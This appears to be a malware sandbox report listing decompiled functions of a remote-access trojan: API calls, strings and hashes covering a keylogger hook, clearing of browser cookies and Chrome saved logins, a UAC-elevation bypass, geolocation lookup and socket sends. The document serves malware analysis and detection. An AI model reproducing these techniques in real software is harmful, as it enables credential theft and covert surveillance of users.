                                                                                                                                                Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$Close$File$FirstNext
                                                                                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                • API String ID: 3527384056-432212279
                                                                                                                                                • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                                                                                                                • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                                                                • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                                                                                                                • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                                                                Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                                                                                • API String ID: 489098229-1431523004
                                                                                                                                                • Opcode ID: 95e2b2175dcad42d57fc42b688d4a52931778c628c4b554f4f231ba9717664a4
                                                                                                                                                • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                                                                                • Opcode Fuzzy Hash: 95e2b2175dcad42d57fc42b688d4a52931778c628c4b554f4f231ba9717664a4
                                                                                                                                                • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                                                                                Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                                                • API String ID: 0-1861860590
                                                                                                                                                • Opcode ID: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                                                                                                                • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                                                                                • Opcode Fuzzy Hash: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                                                                                                                • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                                                                Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _wcslen.LIBCMT ref: 0040755C
                                                                                                                                                • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Object_wcslen
                                                                                                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                • API String ID: 240030777-3166923314
                                                                                                                                                • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                                                                                                                • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                                                                • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                                                                                                                • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                                                                Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3587775597-0
                                                                                                                                                • Opcode ID: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                                                                                                                • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                                                                • Opcode Fuzzy Hash: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                                                                                                                • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                                                                Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                • API String ID: 1164774033-405221262
                                                                                                                                                • Opcode ID: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                                                                                                                • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                                                                • Opcode Fuzzy Hash: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                                                                                                                • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                                                                Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
                                                                                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2341273852-0
                                                                                                                                                • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                                                                                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                                                                • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                                                                                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                                                                Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Find$CreateFirstNext
                                                                                                                                                • String ID: 8SG$PXG$PXG$NG$PG
                                                                                                                                                • API String ID: 341183262-3812160132
                                                                                                                                                • Opcode ID: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                                                                                                                • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                                                                                • Opcode Fuzzy Hash: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                                                                                                                • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                                                Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                                                                • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040A328
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                                                                                                                • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                                                                • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                                                                Strings
                                                                                                                                                • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                • String ID: Keylogger initialization failure: error
                                                                                                                                                • API String ID: 3219506041-952744263
                                                                                                                                                • Opcode ID: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                                                                                                                • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                                                                                • Opcode Fuzzy Hash: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                                                                                                                • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                                                                                                Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetForegroundWindow.USER32 ref: 0040A451
                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1888522110-0
                                                                                                                                                • Opcode ID: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                                                                                                                • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                                                                                • Opcode Fuzzy Hash: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                                                                                                                • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                                                                                Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                • API String ID: 2127411465-314212984
                                                                                                                                                • Opcode ID: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                                                                                                                • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                                                                                • Opcode Fuzzy Hash: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                                                                                                                • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                                                                                Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                                • API String ID: 1589313981-2876530381
                                                                                                                                                • Opcode ID: d444d066f4fdad4d35a34b464d43113e8d04464aaad5ec9ebe6089587c88fb6e
                                                                                                                                                • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                                                                • Opcode Fuzzy Hash: d444d066f4fdad4d35a34b464d43113e8d04464aaad5ec9ebe6089587c88fb6e
                                                                                                                                                • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                                                                Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                                                                Strings
                                                                                                                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                                                                                • API String ID: 3121278467-91888290
                                                                                                                                                • Opcode ID: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                                                                                                                • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                                                                • Opcode Fuzzy Hash: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                                                                                                                • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                                                                Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                                                                Strings
                                                                                                                                                • UserProfile, xrefs: 0040BA59
                                                                                                                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DeleteErrorFileLast
                                                                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                • API String ID: 2018770650-1062637481
                                                                                                                                                • Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                                                                                                                • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                                                                • Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                                                                                                                • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                                                                Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                • GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                • API String ID: 3534403312-3733053543
                                                                                                                                                • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                                • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                                                                • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                                • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                                                                Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 00409293
                                                                                                                                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                                                                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                                                                                                                                  • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                                                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1824512719-0
                                                                                                                                                • Opcode ID: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                                                                                                                • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                                                                                • Opcode Fuzzy Hash: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                                                                                                                • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
